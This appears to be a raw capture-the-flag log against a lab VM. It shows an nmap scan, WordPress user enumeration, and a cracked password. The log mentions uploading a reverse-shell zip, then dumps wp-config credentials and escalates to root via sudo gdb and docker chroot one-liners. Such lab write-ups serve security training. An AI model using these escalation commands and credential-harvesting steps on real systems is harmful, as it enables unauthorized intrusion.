hack@kali:~/CTF$ nmap -A -p- 192.168.1.15
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-28 12:30 CET
Nmap scan report for hulk-buster.homenet.telecomitalia.it (192.168.1.15)
Host is up (0.00048s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 93:0b:57:ce:cb:d5:2b:c5:e6:48:dc:ed:89:6c:51:44 (RSA)
|   256 64:26:e5:bd:85:e9:f8:29:d9:bd:ed:2f:ca:a5:f7:0a (ECDSA)
|_  256 5e:41:4c:19:e2:3c:c4:68:13:0c:5f:6f:f8:71:e6:1b (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 5.3.2
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: recon &#8211; Just another WordPress site
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.89 seconds




[i] User(s) Identified:

[+] recon
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.1.15/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] reconauthor
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)


[i] Valid Combinations Found:
 | Username: reconauthor, Password: football7

reconauthor:football7

Add .zip in wordpress with revese shell inside.

www-data@hulk-buster:/home/offensivehack$ ls -la
total 28
drwxr-xr-x 2 offensivehack docker        4096 Jan 28 13:55 .
drwxr-xr-x 4 root          root          4096 Jan 28 13:34 ..
-rw------- 1 offensivehack offensivehack   72 Jan 28 14:02 .bash_history
-rw-r--r-- 1 offensivehack docker         220 Jan 28 13:34 .bash_logout
-rw-r--r-- 1 offensivehack docker        3771 Jan 28 13:34 .bashrc
-rw-r--r-- 1 offensivehack docker         655 Jan 28 13:34 .profile
-rw-r--r-- 1 root          root            47 Jan 28 13:55 user.txt
www-data@hulk-buster:/home/offensivehack$ cat user.txt
oho!! not finished now.. find root flag.txt !!
www-data@hulk-buster:/home/offensivehack$ 


wp-config.php

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'recon' );

/** MySQL database username */
define( 'DB_USER', 'recon' );

/** MySQL database password */
define( 'DB_PASSWORD', 'password' );

recon       | $P$BUux2GaWekr1f13lCONKLKFRdJupC/0


www-data@hulk-buster:/var/www/html/wordpress$ sudo -u offensivehack /usr/bin/gdb -nx -ex '!sh'
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word".
$ id
uid=1001(offensivehack) gid=119(docker) groups=119(docker)
$ 
$ 
$ whoami
offensivehack


$ docker run -v /root:/mnt it alpine
Unable to find image 'it:latest' locally
docker: Error response from daemon: pull access denied for it, repository does not exist or may require 'docker login'.
See 'docker run --help'.
$ cd /mnt
$ ls
$ ls -la
total 8
drwxr-xr-x  2 root root 4096 Feb 27  2019 .
drwxr-xr-x 23 root root 4096 Jan 28 12:26 ..
$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Unable to find image 'alpine:latest' locally
latest: Pulling from library/alpine
aad63a933944: Pull complete 
Digest: sha256:b276d875eeed9c7d3f1cfa7edb06b22ed22b14219a7d67c52c56612330348239
Status: Downloaded newer image for alpine:latest
# iidd

uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# ssttttyy  rraaww  --eecchhoo

# ls
bin   etc         lib         media  proc  sbin  sys  var
boot  home        lib64       mnt    root  snap  tmp  vmlinuz
dev   initrd.img  lost+found  opt    run   srv   usr
# cd root
# ls
flag.txt
# cat flag.txt
   _____                 _        _       _        _   _   _                                                                                     
  / ____|               | |      | |     | |      | | | | | |                                                                                    
 | |  __  ___   ___   __| |      | | ___ | |__    | | | | | |                                                                                    
 | | |_ |/ _ \ / _ \ / _` |  _   | |/ _ \| '_ \   | | | | | |                                                                                    
 | |__| | (_) | (_) | (_| | | |__| | (_) | |_) |  |_| |_| |_|                                                                                    
  \_____|\___/ \___/ \__,_|  \____/ \___/|_.__/   (_) (_) (_)                                                                                    
              _     _   _             _              __ _                        _       _               _   _     _        _____ _______ ______ 
             | |   | \ | |           | |            / _| |                      | |     (_)             | | | |   (_)      / ____|__   __|  ____|
  _ __   ___ | |_  |  \| | ___   ___ | |__     __ _| |_| |_ ___ _ __   ___  ___ | |_   ___ _ __   __ _  | |_| |__  _ ___  | |       | |  | |__   
 | '_ \ / _ \| __| | . ` |/ _ \ / _ \| '_ \   / _` |  _| __/ _ \ '__| / __|/ _ \| \ \ / / | '_ \ / _` | | __| '_ \| / __| | |       | |  |  __|  
 | | | | (_) | |_  | |\  | (_) | (_) | |_) | | (_| | | | ||  __/ |    \__ \ (_) | |\ V /| | | | | (_| | | |_| | | | \__ \ | |____   | |  | |     
 |_| |_|\___/ \__| |_| \_|\___/ \___/|_.__/   \__,_|_|  \__\___|_|    |___/\___/|_| \_/ |_|_| |_|\__, |  \__|_| |_|_|___/  \_____|  |_|  |_|   
# 


